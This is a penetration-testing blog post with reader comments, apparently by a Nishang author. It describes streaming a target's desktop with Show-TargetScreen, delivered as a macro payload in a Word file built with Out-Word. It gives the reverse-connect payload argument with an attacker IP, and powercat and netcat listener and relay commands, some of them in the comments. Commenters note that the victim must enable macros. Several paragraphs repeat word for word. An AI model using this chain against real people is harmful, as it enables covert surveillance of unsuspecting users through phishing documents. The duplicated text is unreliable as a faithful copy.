Show-TargetScreen is available in the Gather category of Nishang. The current source code looks like this:
Now, to use it for reverse connect, to avoid having to write a listener/server, I used powercat to run a local relay to which Show-TargetScreen connects and we point Firefox to the local port. So, start a powercat listener and relay to any local port. In the below command, Show-TargetScreen will connect to port 443 and Firefox will connect to Port 9000:
Note that if on a *nix machine, netcat could be used as well.
Now, to be able to stream a user's Desktop, Show-TargetScreen must be used with a client side attack. Let's use it with Out-Word from Nishang. Since like other Nishang scripts, Show-TargetScreen.ps1 loads a function with same name, we should pass an argument -"Show-TargetScreen -Reverse -IPAddress 192.168.1.6 -Port 443", and use it as a payload for Out-Word.
Now, to be able to stream a user's Desktop, Show-TargetScreen must be used with a client side attack. Let's use it with Out-Word from Nishang. Since like other Nishang scripts, Show-TargetScreen.ps1 loads a function with same name, we should pass an argument -"Show-TargetScreen -Reverse -IPAddress 192.168.1.6 -Port 443", and use it as a payload for Out-Word.
Now, the generated doc file is to be sent to a target. As soon as a target user opens up the Word file, we will have a connect back on the powercat listener which will relay to the configured local port (TCP 9000 in this example).
Now if we point Firefox to http://127.0.0.1:9000, we have a live stream of the target user's Desktop.
Now if we point Firefox to http://127.0.0.1:9000, we have a live stream of the target user's Desktop.
Awesome! Isn't it? I recently tried this in couple of pen tests and was quite satisfied with the results.
Couple of things which I would like to improve in future:
- Proxy support
- HTTPS Connection.
Feel free to suggest improvements and submit pull requests. Feedback and comments are welcome.
Couple of things which I would like to improve in future:
- Proxy support
- HTTPS Connection.
Feel free to suggest improvements and submit pull requests. Feedback and comments are welcome.
Please explain this part: "As soon as a target user opens up the Word file ...". You probably meant "As soon as a target user opens up the Word file *and* than clicks on Enable Content in order to run the macro ...".
ReplyDeleteThanks
You are right. The target user must Enable Content. I assumed that part when I wrote "As soon as a target user opens up the Word file". Thanks.
DeleteI guess that's a critical assumption, but many people will eventually click enable.
DeleteI would be interested to see how often this works.
Hi, I'm having trouble understanding why the port relay is necessary.. Is this something internal to MJPEG? Sorry if the question is noobish, I'm a student trying to learn more about penetration testing..
ReplyDeleteThanks
Hi,
DeleteThe relay is necessary because, AFAIK, Firefox is unable to listen for connections. The local relay allows us to listen for a connect back and then Firefox could be used to connect to a local port. This eliminates a need of writing a listener/server for the connect back.
Oh, that makes sense. Thanks for the reply, really helped clarify my understanding.
DeleteCan this be extended to enable remote control of the machine?
ReplyDeletehi
ReplyDeletedo i have to use powercat can i use netcat ?
if its possible can you show how to chang it from powert cat to netcat ?
powercat -l -v -p 443 -r tcp:9000 -rep -t 1000
netcat ?
Of course you can use netcat, this should work:
Deletenc -nlvp 443 | nc -nlvp 9000
THX :) /VASCO
Delete